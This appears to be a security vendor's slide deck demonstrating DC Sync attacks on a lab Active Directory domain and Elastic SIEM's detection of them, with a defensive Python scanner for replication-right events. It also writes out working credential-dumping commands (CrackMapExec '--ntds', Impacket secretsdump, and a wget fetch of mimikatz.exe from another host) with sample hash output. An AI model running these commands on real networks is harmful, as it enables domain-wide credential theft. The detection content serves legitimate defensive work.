DC Attack with Elastic
DC Sync Attack
CAUGHT BY ELASTIC AI SIEM
Presented by CarbonHelix
What is a DC Sync Attack?
A DC Sync attack lets an attacker impersonate a Domain Controller to request password hashes from Active Directory — without ever running code on the DC itself.
Using the Directory Replication Service (DRSUAPI) protocol, the attacker simply asks for credential replication, mimicking normal DC-to-DC traffic. The result? Complete credential theft that looks like business as usual.
Compromise Account → Get Replication Rights → Call DsGetNCChanges → Dump NTLM Hashes
Why Most EDRs Can't Stop This
DC Sync exploits legitimate AD functionality — not malware. Blocking the replication protocol would break your entire domain.
LIVING OFF THE LAND
No malicious files, no binaries — just standard RPC calls using tools like Mimikatz, Impacket, or CrackMapExec
AUTHORIZED TRAFFIC
The compromised account has legitimate replication rights — the requests appear fully authorized
BLOCKING = OUTAGES
Hard-blocking DRSUAPI would break DC replication, authentication, and backups across the enterprise
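Because the protocol itself cannot be blocked, the detection has to key on who is replicating. The following is an added example (not Elastic's rule or CarbonHelix's code) that applies the common check to Windows Security event 4662: a non-machine account exercising the DS-Replication-Get-Changes* extended rights. The event records are constructed; the rights GUIDs are the real Active Directory schema values.

```python
"""Flag DC Sync-style replication in Windows Security 4662 events.
Added example for this deck, not Elastic's rule or CarbonHelix code: it flags a
non-machine account exercising DS-Replication-Get-Changes* control-access
rights. All events below are constructed."""
import json

# Extended-right GUIDs that DRSUAPI replication (DsGetNCChanges) requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for "control access" (extended right)

# Constructed events: a DC replicating normally, a user account doing DC Sync,
# and the same user reading an unrelated (made-up GUID) property.
SAMPLE_EVENTS = [
    '{"EventID": 4662, "Computer": "dc02", "SubjectUserName": "DC01$", '
    '"AccessMask": "0x100", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "Computer": "dc02", "SubjectUserName": "kevin.mitnick", '
    '"AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} '
    '{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "Computer": "dc02", "SubjectUserName": "kevin.mitnick", '
    '"AccessMask": "0x10", "Properties": "{deadbeef-0000-4000-8000-000000000001}"}',
]


def matched_rights(event):
    """Replication rights a 4662 event exercises, or [] if not DC Sync-like.
    Machine accounts (trailing '$') are the expected DC-to-DC replication."""
    if event.get("EventID") != 4662:
        return []
    if not int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
        return []
    if event.get("SubjectUserName", "").endswith("$"):
        return []
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def scan(json_lines):
    """One alert dict per DC Sync-like event, shaped like the SIEM alert card."""
    alerts = []
    for line in json_lines:
        ev = json.loads(line)
        rights = matched_rights(ev)
        if rights:
            alerts.append({"user": ev["SubjectUserName"], "host": ev["Computer"],
                           "rights": rights, "mitre": "T1003.006"})
    return alerts
```

In a real domain, exclude the actual DC computer accounts and any Entra Connect / Azure AD Connect service account explicitly rather than relying on the `$` suffix alone, since those accounts legitimately hold these rights.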
Attack #1: CrackMapExec (Remote DC Sync)
The scariest attack — uses SMB for remote replication. Completely bypasses endpoint-level EDR.
kali@attacker
$ nxc smb 10.190.32.10 -u 'kevin.mitnick' --ntds
[*] Windows Server 2019 Build 17763 (domain:hackproof.local)
[+] hackproof.local\kevin.mitnick (Pwn3d!)
[*] Dumping the NTDS, this could take a while...
Administrator:500:aad3b435b51404eeaad3...
hackproof.local\juan:e19ccf75ee54e06b06a5...
hackproof.local\chen:b4b9b02e6f09a9bd760f...
[*] All domain hashes dumped successfully
Medium
⚠ Potential Credential Access via DC Sync
Risk Score: 47
User: kevin.mitnick
Host: dc02
MITRE: T1003.006
Attack #2: Impacket SecretsDump (Remote)
Same goal, different tool. SecretsDump also dumps credentials from the SAM hive — and Elastic catches both techniques.
kali@attacker
$ impacket-secretsdump hackproof.local/kevin.mitnick@10.190.32.10
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping LSA Secrets
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404ee...
hackproof.local\kevin.mitnick:1103:aad3b435...
High
⚠ Potential Remote Credential Access via Registry
Risk Score: 73
User: kevin.mitnick
Host: dc02
MITRE: T1003.002 / T1021
Attack #3: Mimikatz — Blocked Instantly
Mimikatz couldn't even run. Elastic quarantined the binary immediately upon download — the file simply disappeared.
PowerShell - dc02
PS> wget http://10.190.32.12:9090/mimikatz.exe -OutFile mimikatz.exe
PS> ls
(empty — file quarantined by Elastic)
High
🛡 Malware Prevention Alert — QUARANTINED
Risk Score: 73
Rule: Windows.Hacktool.Mimikatz
File: mimikatz.exe
Action: quarantined
Elastic Caught Every Attack
CrackMapExec: Remote DC Sync via SMB/DRSUAPI (DETECTED)
SecretsDump.py: Remote DC Sync + SAM Hive dump (DETECTED)
Mimikatz: Local DC Sync attempt (BLOCKED)
Even attacks that bypass traditional EDRs are caught by Elastic's AI-driven behavioral analysis.
Elastic Attack Discovery
Elastic doesn't just alert — it tells the full story of the attack using AI-powered Attack Discovery.
ATTACK CHAIN CORRELATION
Groups related alerts into coherent attack chains — showing the full sequence of events
MITRE ATT&CK MAPPING
Automatically maps activity to MITRE tactics and techniques for standardized classification
AI-POWERED TRIAGE
Prioritizes real threats, filters noise, and automates investigation — so your analysts focus on what matters
FULL NARRATIVE
Tells who, what, when, where — identifying users, hosts, and the complete attack timeline
MITRE ATT&CK — Attack Chain Mapped
Elastic mapped the full attack to the MITRE ATT&CK framework, highlighting Privilege Escalation, Credential Access, and Lateral Movement.
Reconnaissance
Resource Dev
Initial Access
Execution
Persistence
Priv Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command & Control
Discovery
Credential Dump and Privilege Escalation
Host: dc02
Users: kevin.mitnick
Alerts: 2
Status: Open
Your SOC Has You Covered
3 Attack Tools Tested
3 Attacks Detected
0 Attacks Missed
CarbonHelix + Elastic AI SIEM
Protecting what matters. Even from the attacks that hide in plain sight.